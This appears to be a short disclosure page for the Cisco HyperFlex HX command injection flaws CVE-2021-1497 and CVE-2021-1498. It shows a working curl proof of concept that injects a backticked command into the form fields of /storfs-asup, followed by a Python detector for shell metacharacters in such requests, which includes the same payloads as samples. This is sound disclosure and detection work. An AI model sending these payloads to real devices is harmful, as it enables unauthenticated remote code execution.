    1.04 KB / 2021-05-21 09:14:38
    # Cisco HyperFlex HX Command Injection (CVE-2021-1497/CVE-2021-1498)
    
    
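    Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.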
    
    
    ```
    wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
    *   Trying 192.168.123.133...
    * TCP_NODELAY set
    * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
    > POST /storfs-asup HTTP/1.1
    > Host: 192.168.123.133
    > User-Agent: curl/7.64.1
    > Accept: */*
    > Content-Length: 28
    > Content-Type: application/x-www-form-urlencoded
    >
    * upload completely sent off: 28 out of 28 bytes
    < HTTP/1.1 200 OK
    < Server: nginx/1.8.1
    < Date: Tue, 18 May 2021 00:54:26 GMT
    < Content-Length: 0
    < Connection: keep-alive
    < Front-End-Https: on
    <
    * Connection #0 to host 192.168.123.133 left intact
    * Closing connection 0
    wvu@kharak:~$
    
    ```
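
A defensive check for the request shown above, as an added example that is not part of the original page or of any Cisco code: it flags POST bodies sent to `/storfs-asup` whose form fields contain shell metacharacters after decoding. The metacharacter list, the function names and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl, unquote

WATCHED_PATH = "/storfs-asup"   # endpoint from the request shown on this page
# Assumed list of shell metacharacters that can chain or substitute commands.
SHELL_META = ("`", "$(", ";", "|", "&", ">", "<", "\n", "\r")


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double encoding is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_fields(method, path, body):
    """Return {field: [metacharacters found]} for a POST to WATCHED_PATH."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != WATCHED_PATH:
        return {}
    hits = {}
    # parse_qsl does the first form decoding: %60id%60 becomes `id`.
    for name, value in parse_qsl(body, keep_blank_values=True):
        value = fully_decode(value)
        found = [m for m in SHELL_META if m in value]
        if found:
            hits.setdefault(name, []).extend(found)
    return hits


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", "/storfs-asup", "action=&token=`id`&mode=`id`"),       # body from the page
    ("POST", "/storfs-asup", "action=&token=%2560id%2560&mode=x"),  # double-encoded
    ("POST", "/storfs-asup", "action=status&token=abc123&mode=full"),
    ("POST", "/login", "user=a`b"),                                 # other endpoint
]


def scan(samples):
    """Return (index, hits) for every sample that should raise an alert."""
    return [(i, h) for i, r in enumerate(samples) if (h := suspicious_fields(*r))]


if __name__ == "__main__":
    for index, hits in scan(SAMPLES):
        print(f"request {index}: shell metacharacters in {hits}")
```

The check needs access to the request body, so it belongs in a reverse proxy, WAF rule or traffic-capture pipeline rather than in default access-log parsing.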
    
    ref:
    
    * https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=home
    * https://nvd.nist.gov/vuln/detail/CVE-2021-1497
    * https://nvd.nist.gov/vuln/detail/CVE-2021-1498
    